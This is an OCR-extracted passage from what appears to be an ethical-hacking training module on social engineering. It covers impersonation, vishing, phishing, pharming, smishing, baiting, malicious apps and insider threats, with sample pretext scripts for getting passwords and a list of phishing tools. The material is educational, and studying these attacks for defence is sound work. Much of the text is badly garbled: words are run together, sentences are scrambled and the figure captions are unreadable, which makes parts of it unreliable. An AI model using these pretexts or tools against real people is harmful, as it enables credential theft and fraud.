Mackin ©by E-Comel
Copyright
 tricksthatan attackerperforms
Someimpersonation to gather
sensitive information
aboutthe
the humannature of trust,fear,andmoralobligation.
exploit
targetorganization
Posing EndUser
as a Legitimate

attackermight
‘An an employee
impersonate andthenresort to deviantmethods
to gain
access to privileged
data. They
may provide
a false identity
to obtain sensitive
information.
Anotherexample is whena “friend―
of an employee asksthemto retrieve information
that a bedriddenemployee supposedly needs.Thereis a well-recognized rule i n social
interaction that a favorbegetsa favor, even if the original
“favor―
is offered without a
request
from
the
with reciprocation
impersonation.
recipient.
daily.
Thisis knownas reciprocation.
Socialengineerstry to take advantage Corporate
environmen
deal
of thissocialtrait via

Example:
"Hil
This
ie
is Johnfromthe finance department.
| haveforgotten
mypassword.
Canget
|
Posing
as an Important
User
Anotherbehavioralfactorthat aids a socialengineeris people’s habitof not questioning
authority. People oftengo out of their way for thosewhom theyperceiveto have
authority. An attackerposingas an important individual suchas a vice president
—
or
director —
can often manipulate an unprepared employee. Attackerswho take
impersonation to a higherlevel byassuming the identity of an important employee add
an elementof intimidation.Thereciprocation factoralsoplays a role i n thisscenario
wherelower-levelemployees might go out of their way to helpa higher-authority. For
example, itis lesslikely thata help-desk employee will turn downa request froma vice
president who is hard-pressed for time andneedssome vital informationfor a meeting.
In casean employee refusesto divulge information, socialengineersmayuse authority
to intimidateemployees andmay even threatento reportthe employee's misconduct to
their supervisors.Thistechnique assumes greatersignificance whenthe attacker
considers i t a challengeto getaway with impersonating an authority figure
Example:
"HilThisis Kevin,
systempassword.
the CFO'sSecretary.I'm working
Canyou helpme out?―
and forgot
project,
on a n urgent my
|
Posing Support
as a Technical Agent
Another technique involvesan attackermasquerading as a technicalsupport agent,
when the victim is not proficient
particularly in technicala reas. The attackermay
pretend to be a hardware vendor, a technician,or a computersupplier. One
demonstrationat a hackermeetinghadthe speaker callingStarbucksandasking i ts
‘employees
whethertheir broadbandconnection was properly working.Theperplexed
employee repliedthat it was the modemthat was giving them trouble.Thehacker,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 withoutgivinganycredentials, went on to makehimreadout thecreditcardnumberof
scenario,the attackermay askemployees
the lasttransaction. In a corporate to reveal
theirlogin information, including
theirpassword,to fixa nonexistent problem.
Example:
“Sir,
this is Mathew,technicalsupportat XCompany. Lastnightwe hada system crash
andwe are checking
here, forlostdata.Canyougiveme your IDandpassword?―
Posingas an InternalEmployee,Client,or Vendor
Theattackerusually clothesor anothersuitableuniform.They
dressesup i n business
enter an organization’s
building
while pretending client,service
to be a contractor,
personnel, or anotherauthorizedperson.Thentheyroam aroundunnoticedandlook
for passwords stuckon terminals,extract criticaldata from wastepaper bins,papers
lyingon desks,and perform other information gathering. The attacker may also
implement other socialengineeringtechniques suchas shouldersurfing (observing
users typinglogincredentialsor other sensitive information) and eavesdropping
{purposely overhearing confidential conversations between employees) to gather
sensitive informationthat mighthelplauncha n attackon the organization.
Repairman
Computer technicians,electricians, and telephone repairpersons are generally
unsuspected people. mightimpersonate
Attackers a technicianor repair personand
They
enter the organization. perform
normalactivities associated
with their assumed
dutywhilelooking
for hiddenpasswords,
criticalinformation information
o n desks, in
trashbins,
andotherusefulinformation;theysometimeseven plant
snoopingdevicesi n
hiddenlocations.
Impersonation (Vishing)
Vishing (voice
or VoIP phishing)
is an impersonation technique
i n whichthe attackeruses Voice
technology
over IP (VoIP) their criticalfinancial
to trick individualsinto revealing andpersonal
informationand uses the informationfor financialgain. The
forge
identification.
resembling
a legitimate
pre-recorded
includes
In manycases,Vishing
financialinstitution. Through
Vishing,
attacker
uses callerID spoofing
andinstructions
messages
the attackertricksthe victim into
to

providing
bankaccount or creditcarddetailsforidentity over the phone.
verification
Theattackermaysenda fakeSMSor emailmessage to the victim,askingthe victim to callthe
financialinstitution for credit card or bank account verification.In some cases,the victim
receives a voice callfromthe attacker.When thevictim callsthe numberlistedi n the message
or receives the attacker'scall,theyhearrecordedinstructions that insist theyprovide personal
and financialinformation like name, date of birth,socialsecuritynumber, bankaccount
numbers, credit card numbers, or credentialslike usernames, passwords. Oncethe victim
provides theinformation, therecorded message confirms verification
ofthevictim’saccount.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Discussed
beloware some tricksattackers
use whenVishing sensitive information
to gather
=
Abusing
the Over-Helpfulness
of HelpDesk
Help
desksare frequently
targetedfor socialengineering attacksfor a reason. Thestaff
members to behelpful,
are trained andthey
oftengiveawaysensitive information
such
passwords
‘as andnetworkinformationwithout verifying
the authenticity
of the caller.
Theattackershouldknowemployees’ names andhavedetailsaboutthe person he is

tryingto impersonate to beeffective, Theattackermaycall a company’s helpdesk

pretendingto be a senior officialto tryto extract sensitive informationout of the help
desk
Example:
m an callsa company’s
‘A
the
if hemisses deadline on a big
advertising hisfire
helpdeskandsayshehasforgotten password. Headdsthat
project,hisbossmight him.
Thehelpdeskworkerfeelssorryfor himand quickly resets the password,
unwittingly
givingthe attackerentrance into the corporate
network.
Third-party
Authorization
Anotherpopular
techniqueusedbyan attackeris to represent
themselfa s an agent
authorizedbysome senior authority to obtaininformationon their
i n an organization
behalf
For instance,when an attackerknowsthe name of the employee in the target
authorizedto access the required
organization theykeep
information, a vigil
on themso
that theycan accessthe required data in the absence
of the concerned
employee. In
this case,the attackercan approach
the helpdeskor other personnel
i n the company
claiming thatthe employee (authority
figure)
hasrequested the information.
Eventhough there mightbe suspicionattachedto the authenticity
of the request,
people tend to overlookthis i n favorof being i n the workplace.
helpful People tend to
believethat othersare being honestwhen theyreferencean importantpersonand
provide the requiredinformation.
Thistechnique particularly
is effective, whenthe authority
figure
i s on vacation or
traveling, makinginstant verificationimpossible.
Example:
"Hi,| a m John,
| spoke with Mr. XYZ lastweekbeforehe went on vacation andhesaid
that you wouldbe able to provide me with the informationin hisabsence.
Couldyou
helpm e out?―
Tech
Support
Likethe impersonation of a tech supportagentabove, an attackercan use vishing
to
pretend to be a technicalsupportstaffmemberof the target organization's
software
vendor or contractor to obtainsensitive information.The attackermay pretend to
troubleshoota networkproblem andaskfor the user IDandpassword of a computerto

ical andCountermensores
Mackin ©by E-Comel
Copyright
 detectthe problem.Believing theuser wouldprovide
themto be a troubleshooter, the
requiredinformation.
Example:
Attacker: Somefolksi n your officehavereported
thisis Mikefromtechsupport.
“Hi a
slowdownin logging.
Isthistrue?―
Employee:
“Yes, slowlately.―
it hasseemed
Attacker:“Well,
we havemovedyou to a new server, andyour service shouldbe
muchbetter now. If you want to give me your password,| can checkyour service.
Things
will bebetterfromnow on.―
TrustedAuthority
Figure
Themost effectivemethodof socialengineeringis posingas a trustedauthority figure.
attackermight
‘An pretendto be a fire marshal, superintendent, auditor, director,or
figure
other important over the phone or in-personto obtainsensitive informationfrom
the target.
Example:
1amJohnBrown.I'mwiththeexternalauditor,
1. “Hi, ArthurSanderson. We'vebeen
requested
bythe corporateto do a surprise inspectionof your disasterrecovery
procedures.
Yourdepartment has10 minutes to showme howyou wouldrecover
froma websitecrash.―

haveSharon,
“Hi,
'm
sales York this
a
short
notice,
repout of the New
a groupof prospective
to outsource their security
office.| know is
clientsout in the car, andI've beentryingto
needsto
training us for months.
but
getthem

They're
a
located
that
I
of our facilities,
up.
quick
just fewmilesaway,and I think
it wouldbeenough
to push
if can give thema
themover the edge
tour
andgetthemto sign

Oh yeah,theyare particularly
interestedin what securityprecautions we've
adopted.
It seems someone hackedinto their websitea while back,
whichis one of
thereasonsthey're considering
our company.―
“Hi,
'm with Aircon Express Wereceiveda callthat thecomputer
Services. room is
gettingtoo warm, so | need to checkyour HVACsystem.― Usingprofessional-
sounding terms likeHVAC(Heating, andAir Conditioning)
Ventilation, mayaddjust
enough
credibility masquerade
to an intruder’s to allowthemto access the targeted
secured
resource.

Eavesdropping
Eavesdropping
refersto an unauthorizedperson listening
to a conversation or reading
others’
messages.
the of
It includes interceptionany formof communication,
written,usingchannelssuchas telephone
obtainsensitive information
lines,
email,
suchas passwords, plans,
business phone
audio,
including video,or
An attackercan
and instant messaging.
numbers,
andaddresses.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Shoulder Suxfing
Shouldersurfing is the technique of lookingover someone's shoulderas theykeyinformation
into a device.Attackersuse shoulder surfingto findout passwords, personal
identification
numbers, account numbers, andother information.They sometimes even use binocularsand
otheroptical devices or installsmallc ameras to recordthe actionsperformed on the victim's
system to obtainlogin detailsandothersensitive information
Dumpster Diving
Dumpster diving sensitive personal
is the processof retrieving or organizational
informationby
searchingthrough trash bins, Attackerscan extract confidential data such as user IDs,
passwords,policynumbers, networkdiagrams, account numbers, bankstatements,salarydata,
source code,
salesforecasts, access codes,phone lists,creditcard numbers,calendars,and
organizational
chartson paper or disk.Attackerscan then use this informationto perform
variousmaliciousactivities. Sometimesattackerseven use pretextsto supporttheirdumpster
diving suchas impersonating
initiatives, cleaner,
a repair person, technician, or otherlegitimate
worker,
Informationthatattackers can obtainbysearching through trashbinsincludes:
Phone lists:Disclose
©
Organizational
employees’
numbers.
names andcontact

charts:Disclosedetailsabout the structure of the company,physical

infrastructure,
server rooms, restrictedareas,andotherorganizational
data.
Email printouts,notes,faxes, and memos: Revealpersonal detailsof an employee,
passwords, contacts, insideworking operations,certain usefulinstructions,andother
data.
Policy manuals: Revealinformation regarding employment, system use, andoperations.
Eventnotes,calendars, or computer use logs: Revealinformation regarding the user's
logo n andoff timings,whichhelps the attackerto decideon the besttime to plantheir
attack
Reverse Social Engineering
Generally, reverse socialengineering is difficult to carry out. This is primarily becauseits
execution needsa lot of preparation and skills.In reverse socialengineering,a perpetrator
assumesthe role of a knowledgeable professional so that the organization's employees ask
them for information.Theattackerusually manipulates questions to draw out the required
Information.
First,the socialengineerwill causean incident,
as the problem
Forexample,
solverthrough
an employee
general conversation,
mayaskhowthis problem
a
creatingproblem,
encouraging
hasaffected
andthen present
employees
themself
to askquestions.
files,servers, or equipment.
This provides pertinentinformation to the social engineer. Manydifferent skills and
experiences a re required to carryout this tactic successfully.Providedbeloware some ofthe
techniques involvedi n reverse socialengineering:
Sabotage:Oncethe attackergains access,theywill corruptthe workstationor makeit
appearcorrupted. Undersuchcircumstances, usersseekhelp a s theyfaceproblems.
Modul
9 Page1217 ical andCountermensores
Mackin
©
Copyright
by E-Comel
 ‘Marketing:
To ensure thatthe user callsthe attacker,
the attacker must advertise,The
attackercan do this either byleaving their businesscardi n the target's
office or by

Support:
their on
placing contact
the
error
message
number
Evenif theattacker hasalready
itself,
acquiredthedesiredinformation, theymay
continue to assistthe users so that theyremain ignorant of the hacker'sidentity.
A good example of a reverse socialengineeringvirus is the “MyParty―
worm. Thisvirus
does not relyon sensationalsubject
linesbut rather makesuse of inoffensiveand
realistic
names using
realisticgains
the By
for its attachments.
trust,confirmstheuser'signorance,andcompletes
words,theattacker user’s
thetaskof informationgathering,
Piggybacking
Piggybacking
usually
implies
entryinto a building
or securityarea with the consent of the
authorizedperson.Forexample,an attackermight requestan authorizedpersonto unlock
securitydoor,sayingthat theyhave forgotten their ID badge.
In the interest of common
theauthorizedpersonwill allowtheattackerto passthrough
courtesy, the door.
Tailgating
Tailgating
implies a building
accessing or securedarea without the consent of the authorized
person.It is the act of following
an authorizedpersonthrough a secure entrance,as a polite
user would open and hold the door for thosefollowing them.An attacker, wearinga fake
badge,mightattemptto enter the securedarea byclosely following an authorizedperson
through a door that requireskey access. They
then try to enter the restrictedarea while
pretending to be an authorizedperson.
Diversion Theft
Diversion theft is a technique where attackerstargetdelivery professionalsor transport
companies. Thistechnique is alsoknownas “Roundthe CornerGame― or “Cornet
Game.― The
main objective
Into delivering to
of this technique
the consignment
is trick a personresponsible
to the wronglocation,
for making
thus interrupting
a genuinedelivery
the transaction, For
example, driver
delivering
if the victim is a van
to drive to a locationother thanthe actualdelivery
a package,thenthat person wouldbe persuaded
location.Subjecting
series of socialengineering tricksthusallowsthetheft to besuccessful
the van driver to a

Diversiontheft can also be practicedbysocialengineers o n the Internet; victims can be

persuaded to send sensitive or confidential
filesto some unassociated personwho is not
intendedto receive them.
HoneyTrap
Thehoney trapis a technique
wherean attackertargetsa persononlinebypretending to be an
attractive personandthen begins
a fakeonlinerelationshipto obtainconfidentialinformation
aboutthe targetcompany.In this technique,the victim is an insiderwho possesses critical
informationaboutthe targetorganization.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Baiting
Baiting i n whichattackersoffer end users something
is a technique alluring
i n exchange for
importantinformationsuchas logindetailsandother sensitive data.Thistechnique relieson
the curiosityandgreed Attackersperform
of the end-users. byleaving
this technique a physical
devicesuchas a USBflashdrivecontaining wherepeople
maliciousfilesin locations can easily
find them,suchas parking
legitimate
company’s
systems.
logo,
thereby
lots,elevators,
tricking
end-users
andbathrooms. Thisphysical
into trustingit andopeningit on their
Oncethe victim connectsand opens the device,
a malicious
is
device labeled with a

file downloads.It infects

andallowstheattacker
the system to takecontrol
Forexample, an attackerleavessome bait in the formof a USBdrive in the elevatorwiththe
label“Employee Salary
Information2019―anda legitimate logo.
company’s Out of curiosityand
the victim picks
‘greed, up the deviceand opensit up on their system, whichdownloads the
bait.Oncethe bait is downloaded, a piece of malicious
softwareinstallson the victim'ssystem,
givingtheattackeraccess.
QuidPro Quo
Quidpro quo is a Latin phrase
that meaning“something
for something.―
In this technique,
attackerskeepcallingrandomnumberswithin a company,claiming to be calling
fromtechnical
Thisis a baiting
support. technique
whereattackersoffertheir service to end-users i n exchange
ofconfidential
dataor login
credentials.
For example, an attacker gathers random phone numbersof the employees of a target
organization. They thenstart callingeachnumber, pretending to be fromthe IT department.
Theattackereventually findssomeone with a genuine technicalissueandofferstheir service to
resolveit. The attacker can thenaskthe victimto followa series of stepsandto typei n the
specificcommands to installandlaunchmaliciousfilesthat contain malwaredesigned to collect
sensitive information.
Elicitation
Elicitationis the technique
of extracting specificinformationfromthe victim byinvolvingthem
in normaland disarming conversations. In this technique, attackersmust possessgood social
skillsto take advantageof professional or socialopportunities to communicate with persons

to
whohaveaccess sensitive information. In socialengineering,the purposeofelicitation
extract relevantinformationto gain access to the targetassets.
i s to

For example, if an attacker'sobjective is to obtainthe victim'susername andpassword

andthe
conversation with themonly yields things thattheylike,thentheattackermust workmore on
theelicitationprocess to extract the relevantinformation

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SocialEngineering
Computer-based

Windows
Pop-Up |
crsen too
©Windowsthat udeny popup whl srg the nts
in
a ak for norton

Letters
Hoax
the thet
tral that poe worse
unerspneer
wer aboutnew vr, Tolnaor wos ey harm

ts pts
Letters number
of
cain Emails
t hatofferfee sucha s money andsoftwareon contion hat the s e forward
thermal spectnad people

|
InstantChat_|
accseager by
chatting
wth
meldenlected
eres,
Gathering
personal
information
auchebith cots and
wer one eget infrmaton

Spam network
Email information
relevant,u nwanted,
anduso
‘cilecurty numbers,and
emai that attempt
to col nani information,

SocialEngineering
Computer-based
Attackersperform

Discussed
social malicious
computer-basedengineering using various
applications
viruses, trojans,andspyware,and software
beloware typesof computer-based
programssuchas.
suchas emailand instant messaging
socialengineeringattacks:
Pop-Up

Pop-ups
Windows
compel
trick or clickinghyperlink
users into a that redirectsthemto fakeweb
pagesasking for personal informationor downloading maliciousprogramssuchas
keyloggers, trojans,or spyware.

Thecommon methodof enticinga user to clicka buttoni n a pop-upwindowis by

warning of a problem, suchas displaying a realisticoperating systemor application
error
message, or byoffering additionalservices. Awindowappearson the screen requesting
the user to re-login or warningabout an interruption i n the hostconnection,andthat
the network connection needs re-authentication.When the user follows these
instructions,a maliciousprograminstalls,extracts the target's
sensitive information,
andsendsit to the attacker'semailaddressor a remote site. Thistypeof attackuses
trojansand
viruses,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Examples
of pop-upsusedfortricking
users:

‘orve
me
aor
woea
1Million

Hoax Letters
showing
Screenshots
Figure9.2: sample windows
pop-up

hoaxis a message
‘A warningits recipients of a non-existentcomputer virus threat.It
relieson socialengineeringto spread i ts reach.Usually, hoaxesdo not cause any
physicaldamage but they
or lossof information; cause a lossof productivity
anduse an
organization’
valuablenetworkresources.
ChainLetters
A chainletter is a messageoffering free gifts,suchas money and software, on the
conditionthat the user forwards the emailto a predetermined numberof recipients.
Commonapproaches usedi n chainlettersare emotionally “get-ri
convincing stories,
quick―
pyramid schemes, spiritual
beliefs, threatsof badluckto the
and superstitious
recipientif they“break
the chain"and fail to passon the message or simplyrefuseto
readitscontent. Chainlettersalsorely to spread.
o n socialengineering

InstantChatMessenger
attackerchatswith selected
‘An onlineusersvia instant chat messengers andtries to
gathertheir personalinformationsuchas dateof birth or maidenname. They then use
theacquired informationto crackusers’
accounts.
Email
‘Spam
Spamis irrelevant,unwanted,and unsolicitedemailsdesigned to collectfinancial
numbers,
informationsuchas socialsecurity and networkinformation.Attackerssend
spammessages to the targetto collectsensitive information,
suchas bankdetails.
Attackersmay alsosendemailattachmentswith hiddenmaliciousprograms suchas
engineerstry to hidethe file extension bygiving the
viruses and trojans.Social

along
attachment filename.
Scareware
Scareware is a typeof malwarethat trickscomputer malware-infested
users into visiting
websites or downloading or buying malicious
potentially software. i s often
Scareware
seen i n pop-ups that tell the targetuser that their machinehasbeen infectedwith
malware,Thesepop-upsconvincingly appear as though theyare comingfrom a
legitimate source suchas an antivirus company. Further, thesepop-upadsalways have
a senseof urgencyandtell the victim to quickly download thesoftwareif they
want to
getrid of the supposed virus.

9
Module Page1224 ical andCountermensores
Mackin
©
Copyright
by E-Comel
 SocialEngineering:
Computer-based Phishing

ps
redrecthattrustworthy
wes
ses,
to fhe webpages mirc which
ak the

|
SocialEngineering:
Computer-based Phishing
(Contd) CEH

Modul
9 1222
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
 SocialEngineering:
Computer-based Phishing
(Cont'd)
‘Types
of Phishing

tecikcpenen
ertimetpee
eons
Pharming

Avvo gum Dt
ems stant Mes
s

Phishing
Phishing
is @technique an emailor provides
i n whichan attackersends a link falsely
claiming
to
befroma legitimate site to acquirea user'spersonal or account information.
Theattacker

theyare
a
to users. Whena user clicks
lured into sharing
a
registersfakedomainname,builds lookalikewebsite,
o n the emaillink,
andthen mailsthefakewebsite'slink
them to the fake webpage,
i t redirects where
sensitive detailssuchas their addressandcreditcardinformation
Some of the reasons behindthe success of phishing lackof knowledge,
scams includeusers’
being visuallydeceived,andnot payingattention to security indicators.
Thescreenshot belowis an example of an illegitimate
emailthat claimsto befroma legitimate
sender.Theemaillink redirectsusersto a fakewebpage andasksthemto submittheirpersonal
or financialdetails.

92: showing thephishing

Figure Sreenshot technique

ical andCountermensores
Mackin ©by E-Comel
Copyright
Examples
of Phishing
Emails
Source:https:/fits.tntech.edu

Today,
most people
use internet banking.
Manypeople
use Internet banking
for all their
financialneeds, suchas onlinesharetrading
and e-commerce. Phishinginvolvesfraudulently
acquiringsensitive information(like
passwords bymasquerading
and credit carddetails) as a
trustedentity.
Thetargetreceives an emailthat appears to befromthe bankandrequests the user to clickon
the URLor the link provided. theirusername, password,
If the user is trickedandprovides and
other information,then the site forwardsthe informationto the attacker,whowill use it for
nefarious purposes.

Subject:importantchangeto your a

eee

Activity
Alert

ear
Valued
Customer
ad, josuzenitinech

Security
Checkpoint

Figure
93:
Screenshot
showing»
phishing em i

ical andCountermensores
Mackin ©by E-Comel
Copyright
 94:
Figure Screenshotshowing»
phishing
em l l

TennesseeTechJbPlacement& StudentSenicesselect youasa SecretShopper

{Rj
fete that
wi
not
You
can present
make
to or
studies
no expy
atec your
rewarding
vis
up $1000
employment and signup fe. un
w el alo, o ew deals of h e ob and pase
and
wobste

‘Types
of Phishing

Spear
Phishing
of
Instead sending
specialized
use
of employees
out thousandsof emails,some attackers
socialengineeringcontent directed
optfor “spear
at a specific
employee
phishing―
and
or smallgroup
to stealsensitive datasuchas financialinformationand
i n an organization
tradesecrets,
Spear
phishing seem to
messages come froma trustedsource with an official-looking
website,Theemailalsoappearsto befrom an individualfromthe recipient's company,
generallysomeone i n a positionof authority. In reality,
the messagei s sent byan
attackerattempting to obtain criticalinformationabout a specific
recipientand their
suchas logincredentials,
organization, credit carddetails,bankaccount numbers,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 confidential
passwords, documents,financialinformation,and trade secrets. Spear
phishing
generatesa higher
response rate comparedto a normalphishingattack, as it
appearsto befroma trustedcompanysource.
Whaling
‘whaling
attackis a typeof phishing
thattargetshighprofile
executives likeCEO,
CFO,
politicians,
andcelebritieswhohavecomplete
access to confidentialandhighly
valuable
information.
its socialengineeringtrick i n whichthe attacker
a tricksthe victim into
revealing
critical corporateand personal information (likebank account details,
‘employee
details,
customer information, generally,
and credit card details), through
emailor websitespoofing.
Whaling attack;theemail
is differentfroma normalphishing
or websiteusedfor the attackis carefully designed,
usually
targetingsomeone i n the
executive
Pharming
leadership,
Pharming in whichthe attackerexecutes malicious
is a socialengineeringtechnique
programson a victim'scomputer or server, and whenthe victim enters any URLor
domainname, it automatically redirectsthevictim’s
trafficto an attacker-controlled
website.Thisattack is alsoknown as “Phishingwithout a Lure.―
Theattackersteals
confidential
information banking
likecredentials, andotherinformation
details, related
to web-basedservices.

Pharming
attackcan be performed
i n two ways: DNSCachePoisoning
and Host File
Modification
DNSCachePoisoning:
©. Theattacker performs
DNSCachePoisoning
on the targeted
DNSserver.
©. Theattackermodifies
the IPaddress
of the targetwebsite
“www.targetwebsite.com―
to that of a fakewebsite“www.hackerwebsite.com.―
‘When addressbar,a
the victim enters the targetwebsite'sURLi n the browser's
is sentto the DNSserver
request
to of
obtainthe IP addressthe targetwebsite.

DNS
©.
The server returns a fakeIP
Finally,
address
that
thevictim is redirectedto the fake
modified
by
is already

website,
theattacker.

Host FileModification:
©. Anattackersends
a maliciouscodeas an emailattachment.
© Whenthe user clickso n the attachment,
thecodeexecutesandmodifies localhost
fileson the user’s
computer.
© Whenthe victim enters the targetwebsite’s
URL i n the browsersaddressbar,the
compromised hostfile automatically
redirectsthe user'strafficto the fraudulent
websitecontrolledbythe hacker.
Pharming
attackscan alsobe performed
usingmalwarelikeTrojan
horsesor worms.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Spimming
SPIM (Spam over Instant Messaging)
exploits
Instant Messagingplatforms and uses IM
as a tool to spread spam.A personwho generates spamover IM is calledSpimmer.
Spimmers generally
makeuse of bots (anapplication
that executes automatedtasks
the network)
‘over to harvestInstantMessage
IDsandforwardspammessages to them
likeemailspam,generally
SPIM messages, includeadvertisements
andmalwareas an
attachmentor embedded hyperlink,Theuser clicks
the attachmentandis redirected
to
a maliciouswebsitethat collectsfinancialand personal informationlike credentials,
bankaccount,andcreditcarddetails

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Phishing
Tools

shennan srbene sxacevt

|

Tools
Phishing
Phishing
toolscan beusedbyattackersto generate
fake loginpagesto capture usernames and
passwords,sendspoofed andobtainthevictim'sIP address
emails, and sessioncookies.This
informationcan furtherbe usedbythe attacker,
whowill use it to impersonate a legitimate
user and launch
furtherattacks
on the targetorganization.
+
ShellPhish
Source:https://aithub.com
ShellPhishis a phishing
tool used to phishuser credentials
from various social
networking
platformssuch as Instagram,
Facebook,Twitter,
and LinkedIn.It also
displays
the victim system’s
publicIP address,
browser information,
hostname,
geolocation,
and
other
information.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure96: Screenshotof ShellPhish

shotshowing
theouputofShellPhish

ical andCountermensores
Mackin ©by E-Comel
Copyright
 phishing
Someadditional toolsare listedbelow:
=

BLACKEYE
(https://github.com)
+

+
Phishx
(https://github.com)
(hetps://github.com)
Modlishka
Trape(https://github.com)
(https://github.com)
Evilginx

tical
Making
and by
CountermensoresCopyright©
Comet
 Mobile-basedSocialEngineering: MaliciousApps
Publishing
and Repackaging
Legitimate
Apps
Malicious
Publishing py Repackaging
Legitimate
Apps

byron thatson eden acon.

Social Engineering
‘Mobile-based
Publishing
Malicious Apps
In mobile-based socialengineering,the attackerperforms a socialengineeringattackusing
maliciousmobileapps. Theattackerfirst creates the
appwith attractive features andpublishes
— malicious
application
it on majorapplication
suchas a gaming
—

stores usingthe popular

ames. Unawareof the malicious
believing
application,
it to begenuine.Once the application
that sendsthe user's credentials (usernames,
mobile
a user will downloadit onto their
thedeviceis infected
is installed,
passwords),
device,
bymalware
contact details,and other
informationto the attacker.

attacker
4 ‘Application
e
Gaming
Malicious AppStore

Cents intl the

macious|

Modul
9 1234
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
Repackaging
Legitimate
Apps
Sometimes malwarecan be hiddenwithin legitimate apps. A legitimate
developer creates
legitimategamingapplications. Platformvendorscreate centralizedmarketplaces to allow
mobileusers to conveniently browseand installthesegamesand apps. Usually, developers
submitgamingapplications to thesemarketplaces, making them available
to thousands of
mobileusers. A maliciousdeveloper downloadsa legitimategame, repackagesit with malware,
and uploads it to the third-partyapplication
store. Oncea user downloads the malicious
application,the maliciousprogram installedon the user'smobiledevicecollectsthe user's
information andsendsi t to the attacker.
Developer
creates Malicious
developer
EE
ess
e8 =.
store
=
Developer

to the malcous tothied-party

appstore

Legitimate
Developer

‘nd
user downloads
maliciousgaming
app

Third-Party
‘App
Store

99:
Figure Repackaging
legitimate
apps

ical andCountermensores
Mackin ©by E-Comel
Copyright
 |
Mobile-basedSocialEngineering:
FakeSecurity
Applications CEH

Fake Security Applications

application
Attackersmay senda fake security to perform
mobile-based
socialengineering. In
this attack, bysending
the attackerfirstinfectsthe victim'scomputer something malicious.
They
account,malware a
then uploadmaliciousapplication
i n the system
downloadan application
a pop-upmessage
on their phoneto receive a message
the
to an appstore. When victim logs
displays telling
o n to theirbank
the victim that they
from security.
needto
The victim
downloadsthe application from the attacker'sapp store, believing
theyare downloading a
genuineapp. Oncethe user downloadsthe application, the attackerobtainsconfidential
informationsuchas bank account login credentials(username and password),whereupon a
secondauthenticationis sent bythe bank to the victim via SMS.Using that information,
the
attackeraccesses thevictim’s
bankaccount.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ‘User
logson
account;
to
a message thelr
bank
willappear
the user to downoadan
telling
application
to
their
pone

Usercredentias sent

Attacker{otheattacker

>
rc
Figure920:
m) applications
Fakesecurity

9
Module 1234
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
 Mobile-basedSocialEngineering: (SMS
SMiShing Phishing)

2) 3 oe
Sis tet
rect {hating Rian |
|
serie

Chemodue ter persona!

(SMS
SMiShing Phishing)
Sending SMS is another technique used by attackersi n performing mobile-basedsocial
engineering.In SMiShing (SMS Phishing),
theSMStext messaging systemis usedto lureusers
into taking
instant action suchas downloading
malware, visitinga maliciouswebpage,or calling
a fraudulent phone number.SMiShing messages are craftedto provoke an instantaction from
the
victim, requiringthemto divulge
ConsiderTracy,
their personal
a softwareengineer working
information
i n a reputed
and
account
details.
company. She receives an SMS
ostensibly fromthe security department of XIM Bank.It claimsto be urgent,andthe message
saysthat Tracy shouldcallthe phone numberlistedi n the SMSimmediately. Worried,shecalls
to check o n her account, believingit to be an authentic XIM Bankcustomer service phone

password. message
number.Arecorded
Tracy her her
credit
believesdebit well
asks to provide
itis a genuinemessage andshares
or cardnumber,as
sensitive information.
as her

lucky a that
Sometimesmessage
the
w inner and that they randomly
claims
merely
or otherinformation.
contact number,
user haswon moneyor hasbeen selectedas a
needto pay a nominalfee andsharetheir emailaddress,

BD senses

Shing (SMS
Figure9.11: Phishing)
Modul
9 1235
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
 ModuleFlow

Concepts
Social Engineering
Sites
Networking

Soctal
Engineering
Techniques,
Thott Hdentity

Countermeasures

Insider Threats/InsiderAttacks

byor
contractor
negigees
parfomed mplayer car

‘Steal
confidential
dat

Heasons revenge

‘Rttacks
for Insider
come futurecompetitor

competitor’
Perform bidding _

Insider Threats
insider is any
‘An employee
(trusted
person)
who has access to the critical assets of an
An insiderattackinvolvesusingprivileged
organization. accessto violaterulesor intentionally
cause a threat to the organization’s
informationor informationsystems. Insiderscan easily
bypass securityrules,corruptvaluableresources, and access sensitive information. Insider
attacksmaycause greatlossto the company.Further, theyare dangerous becausetheyare
easyto launchanddifficultto detect.

Modul
09 Page1236 ical andCountermensores
Mackin Copyright
©
by E-Comel
Insider
=
attacks
a re

Privileged
generally
performed by:
Users:Attacksmaycome fromthe most trustedemployees of the company,
such as managersand systemadministrators, who have access to the company’s
confidentialdataand a higher of misusingthe data,either intentionally
probability or
unintentionally.
Disgruntled
Employees:
Attacksmay come from unhappy
employees
or contract
workers.Disgruntled
employees,who intend to take revengeon the company, first
andthenwait forthe right
acquireinformation time to compromisethe organization's
resources.
TerminatedEmployees: Someemployees
takevaluableinformationaboutthe company
with them when terminated.Theseemployees access the company’s data after
termination using backdoors,
malware, if theyare not disabled.
or theiroldcredentials

Accident-Prone Employees: If an employee accidentally

losestheir mobiledevice,
sends
an emailto incorrect recipients, or leaves loadedwith confidential
a system datalogged-
in, itcan leadto unintentionaldatadisclosure.
likeremote employees,
ThirdParties:Thirdparties, dealers,
partners, andvendors, have
access to the company’s information. However,the securityof their systemsi s
unpredictableandcouldbe a source of informationleaks.
UndertrainedStaff:Atrustedemployee
of cybersecurity
becomes a n unintentional
training.Theyfail to adhereto cybersecurity
insiderdue a lack
policies,procedures, to
Companies
and
guidelines,bestpractices.
in whichinsiderattacksa re common include creditcardcompanies,health-care
as well as financialandexchange
companies,networkservice providers, service providers.

Reasonsfor InsiderAttacks
=
Financial
Gain
{Anattackerperforms an insiderattackmainlyfor financialgain. The insidersellsthe
sensitive informationto its competitor,stealsa colleague's
company’s financialdetails
for personaluse, or manipulates the company's financialrecordsor that of its
personnel.
StealConfidential
Data
‘A
competitor mayinflictdamage stealcriticalinformation,
uponthe targetorganization,
just byfinding
or even put them out of business a jobopening, preparing someone to

getthrough theinterview,andhaving that personhiredbythecompetitor.

Revenge
It onlytakesone disgruntled
